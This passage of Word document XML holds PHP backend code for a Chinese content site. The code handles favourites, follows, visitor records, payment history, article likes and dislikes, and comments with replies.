    <w:p w14:paraId="51E746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8E37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EB8A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193FF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收藏失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450735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code' =&gt; 501,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4093E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491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EBA3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DDB55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7B8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voriteDel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29243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8BF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 ? input('param.aid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5423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5E98B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5BA40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F8E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12091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01A3E4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8BB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56C6B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B63D5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40114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72F3D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31A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A487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favorite')-&gt;where(['uid' =&gt; $this-&gt;memberId, 'aid' =&gt; $aid, 'type' =&gt; 0])-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBA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22773F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this-&gt;memberId, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除收藏</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id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BCB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0A39D3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取消收藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6767FC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4FB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6AD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676AA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取消失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B922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6672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03F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A434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B6CD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3510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ayRecords()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D68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843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 = input('param.status') ? input('param.status') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640D4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aram.type') ? input('param.type') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4ED0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 input('param.sctype') ? input('param.sctype') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039B51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 ? input('param.pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A3C7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E387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 =&gt; 'in:0,1|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D82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in:1,2,3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E1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gt; 'in:0,1,2|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38878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43650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3391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36FD5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tatus' =&gt; $status,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0456D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1321C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gt; $sctype,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1269E7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ages' =&gt; $pages,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E6F0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9560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76A2CB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E6CE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1409CD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7226A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6A5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9D60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atus) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7FB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tatus'] = $status;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C31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E6E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32657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ype'] = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FC0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CF5D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ctype) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F42F1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ctype'] = $sctype;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163F90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93D5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0583A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pay_record')-&gt;where($where)-&gt;order('id desc')-&gt;field('id,money,status,type,ip,info,sctype,scookies,create_time')-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E6A7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type = [0 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>充值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 1 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消费</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 2 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>购买</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VIP'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA68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3CA76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sctype'] = $sctype[$v['sctype']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF90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reate_time'] = date('Y-m-d H:i:s', $v['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B49C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money'] = $data['data'][$k]['money'] / 100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF041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11CF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940BC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9ABC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uanzhu()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022E62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7BE4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 input('param.gz_uid/d') ? input('param.gz_uid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B24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4A91C9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gt; 'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF6C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1463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22A44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gt; $gz_uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A860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8099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7A988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98FA2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264E98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3037B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9C9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CBF2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1326BA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hou = Db::name('member_guanzhu')-&gt;where(['uid' =&gt; $uid, 'gz_uid' =&gt; $gz_uid])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCFFE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hou) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79550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EED4B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关注过了，在我的查看我的关注</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00743F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06A32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4E82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EE2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uid'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDFB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gz_uid'] = $gz_uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE00B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1730D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guanzhu')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470445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9E4A3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uid, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关注会员</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gz_uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2353B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5DAFD9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关注成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2525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28F2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7E86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5A131F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关注失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB78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5D30B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E1C0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A38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8A29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C4BE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uanzhuDel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D133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BC0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 input('param.gz_uid/d') ? input('param.gz_uid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BB9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21F593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gt; 'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652FAA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9C3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3380FE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gt; $gz_uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B2B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31D3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296C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CD7C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7E2E60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43B5B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31A8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293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47DF6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guanzhu')-&gt;where(['uid' =&gt; $uid, 'gz_uid' =&gt; $gz_uid])-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B2D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8E55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uid, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>取消关注会员</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gz_uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C1F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433607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取消成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABA6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3A3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E8F3B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47E815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取消失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F3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03E7D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FB14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6050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001D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C45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uanzhuList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41191C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6E1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 ? input('param.pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BB5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aram.type') ? input('param.type') : '';     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32170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type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392EAC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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E997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CCD0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C54B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58B32D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number|in:1,2',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD28B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4C1A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69398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775F22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17B897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F9407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0CEBF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3301A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77715D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32EE5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2D53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F84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1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D4C1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id = 'a.gz_uid';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FFB6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 = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121728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D7E9B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id = 'a.uid';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1AB6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gz_uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EB0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440A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15657E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w', $auid . '=w.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B397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C8B6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guanzhu')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;order('a.id desc')-&gt;field('w.id,w.img')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFC6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CFC4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id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED0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2166E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0469F4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qianming'] = $user['qianming'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE02A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 = Db::name('member_guanzhu')-&gt;where(['uid' =&gt; $this-&gt;memberId, 'gz_uid' =&gt; $user['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D49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3A2A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7A71E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B605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ngke()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F30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B1A5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 ? input('param.pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A32B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71F66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0ABCE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1F0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2F51C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4048AC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05AC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7C15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E7BC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5CFE3B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code' =&gt; 202,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204621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AE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3BEA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_uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA39A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fangke')-&gt;where($where)-&gt;field('uid')-&gt;order('id desc')-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6E76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4ECDE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4C70BB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d'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE866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3DA76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59EC5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Db::name('member_fangke')-&gt;where(['uid' =&gt; $v['uid']])-&gt;order('id desc')-&gt;value('time');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A42D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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>访问时间：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>" . date('m-d H:i', $time);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE89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 = Db::name('member_guanzhu')-&gt;where(['uid' =&gt; $this-&gt;memberId, 'gz_uid' =&gt; $user['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B59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C61F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5AB6C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74AF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angkejilu()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383FA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3D4A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_uid = input('param.f_uid/d') ? input('param.f_uid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F54A8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5DCF0B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_uid' =&gt; 'require|number',   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF587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5BF0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2A261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_uid' =&gt; $f_uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136F5F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B9B9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A1987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071E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0CD619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CA603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E547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07D0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50DDBB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Id == $f_uid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657361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166CB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D36E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_uid'] = $f_uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41361A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53A08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fangke')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E8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455379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E5FE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db,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF0C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623C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FB00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F5BD2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70B937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0C970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35E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D61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1C1D63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ancai()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8CBD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412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 input('param.aid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267107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aram.type/d', ''); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048844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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC083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6FB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47731F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268B2C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require|number|in:1,2',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442929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3C78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CDED3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0B552C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5D96B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884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7D10D0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91706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536936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64E6A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641A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4688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0CFEF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 Db::name('article_zan')-&gt;where(['aid' =&gt; $aid, 'uid' =&gt; $uid])-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D97F0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zan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F504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zan['zan']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA95F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您已经赞过啦！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED30F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211DE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您已经踩过啦！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42834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BC73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8B5FC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text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1895D7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4766F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11FC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4080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ype == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E223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 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6877B0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iduan = 'zan';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB92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type == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B208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ai'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E23C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iduan = 'cai';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B6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61BA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0E407B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5ACF3B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5B19B2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_uid'] = Db::name('article')-&gt;where('id', $aid)-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F1E6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zan')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72368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1C2F8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 =&gt; $aid])-&gt;setInc($ziduan);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC10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BAF0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 =&gt; $db,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4F9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3ADA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8ED85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B1F8E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64A003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69C00E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F8E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6559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268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2621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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D03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F1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 input('param.aid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11051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 'strip_tags') ? input('param.content', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1AAD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 input('param.pingId/d') ? input('param.pingId/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197951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2 = input('param.pingId2/d') ? input('param.pingId2/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E48D1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2A89E0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066CF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gt; 'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6662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2' =&gt; 'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ED88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A983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21276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7F8E46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 =&gt; $pingId,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103E80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2' =&gt; $pingId2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DF6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15B9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27FED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0D83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10A03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83BCC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10F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2D57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458C7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 Db::name('article_ping')-&gt;whereTime('time', 'today')-&gt;where(['uid' =&gt; $uid])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C067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 &gt; 100) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B58E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C74B4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发布失败，每日发布评论限制</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条内</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342B40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7A4A7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720C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35DA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Id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69EC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5C9EA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4DAD2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06BE7F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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55256A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_uid'] = Db::name('article')-&gt;where('id', $aid)-&gt;cache(true)-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1771F6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gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F837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12676C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 =&gt; $aid])-&gt;setInc('pingNum');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AD6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A75AD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db,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F92A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852F9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2327A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5945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66FDF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38FBD8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B0AA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82A5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30AF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_uid = db::name('article_ping')-&gt;where(['id' =&gt; $pingId])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC65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_id'] = $pingId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC36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_uid'] = $ping_uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5882E4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307B26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7F7BCA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4B032F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ingId2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544C1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ngId2 = db::name('article_ping_xia')-&gt;where(['id' =&gt; $pingId2])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068DEA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pingId2['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5911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content . '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0308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864D6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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F79D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A0FE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_xia')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4296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49E1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FBE5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db,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AACC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9AE2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DF5B9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6D34F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639D39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1C489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E086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81C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CD5B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3AED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7B9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Zan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E73B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250B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 input('param.aid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7025C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45E2C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5BD38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F6E9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077706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7C379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ABCDF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ADAD9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8DEC8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15C279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0B1E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62B4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A3A7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4D4C8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zan = Db::name('article_ping_zan')-&gt;where(['pingId' =&gt; $aid, 'uid' =&gt; $uid])-&gt;cache(_cache('db'))-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2E57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zan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DE83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74A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赞过啦！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098AE8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310E4A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44A6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C340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 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8F9B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293D9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Id'] = $aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B609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04E202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_zan')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D73D1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0F4A6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gt;where(['id' =&gt; $aid])-&gt;setInc('zan');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342743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146AE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db,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAB59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82B0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FC13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3B3E3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17200D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3ACBF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38F6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5CB7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F1A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DAC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Zan_xia()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21148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DF7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 input('param.aid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F8A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44B28B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require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A66A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4B0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68B6D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aid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A48D0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621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B7391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BA1B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052CA2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C624E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6D74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13C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5ECACF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zan = Db::name('article_ping_xia_zan')-&gt;where(['pingId' =&gt; $aid, 'uid' =&gt; $uid])-&gt;cache(_cache('db'))-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25852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zan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F878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72D9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赞过啦！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29B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37BBAD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FE7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D20C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 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8F7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here['uid'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EF76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Id'] = $aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D994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0C0A4D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_xia_zan')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0257A9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80BD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_ping_xia')-&gt;where(['id' =&gt; $aid])-&gt;setInc('zan');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AD46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77F7C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db,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DEE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1F9A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180F9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BE86C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7E98D0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774A4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0CB42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C958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4DC5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A895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zanList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779F4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A6CF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d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166821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3CFD3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46FAC4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4EE1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620F8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69E46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EA61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2F9C1A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2A53A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7CB51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7DFB05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16F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4C1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331AFE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uid'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAE6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174C89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ARTICLE_PING__ w', 'a.pingId=w.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4459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2E62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_zan')-&gt;where($where)-&gt;alias('a')-&gt;join($join)-&gt;field('a.uid,w.content,a.pingId,w.aid,a.time')-&gt;order('a.time desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41795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66B171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4060A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5770D3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1E7A9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date('m-d H:i', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCAE4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A935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4788D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38B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List()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071BC0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C05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d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4516C2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validate = new Validate([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15263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760BDA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C814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9BC6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4B298C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0B9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AB289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E5BD7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3473BF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578B2E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7B02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1814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31D6E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ping_uid'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D97F8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_xia')-&gt;where($where)-&gt;order('time desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A26EA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72000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05B78D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6DBF9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6AFF2C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date('m-d H:i', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4CF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ontentPing'] = db::name('article_ping')-&gt;where(['id' =&gt; $v['ping_id']])-&gt;value('content');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C91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75F1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1D0A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305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houcangList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2F71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13D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d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467D8E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param.type/d', '');  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C6D6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C29C2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29154D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in:0,1|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31494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CCB8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62CDD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0DB045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type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E752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21A6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15F544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D48C7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C12FD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2F822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EA13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0D8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1B6BBD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 = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E8D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type'] = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3965D6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12D2EB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ARTICLE__ w', 'a.aid=w.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4097C7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C3A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pConfig'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015C1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 = Db::name('member_favorite')-&gt;where($where)-&gt;alias('a')-&gt;join($join)-&gt;field('w.id,w.title,w.description,w.mychannel,w.image,w.create_time,w.source,w.pingNum,w.images,w.videodate,w.uid,w.click,w.weitoutiao,w.zan,w.video,w.qiniu_video_type,content')-&gt;order('a.time desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457E4C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93B2C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amp;&amp; $v['mychannel'] != 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E37B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v['image'] . "?imageView2/1/w/172/h/120";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D344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8F6EC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03E10D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v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA0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7886F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1) {</w:t>
      </w:r>
    </w:p>
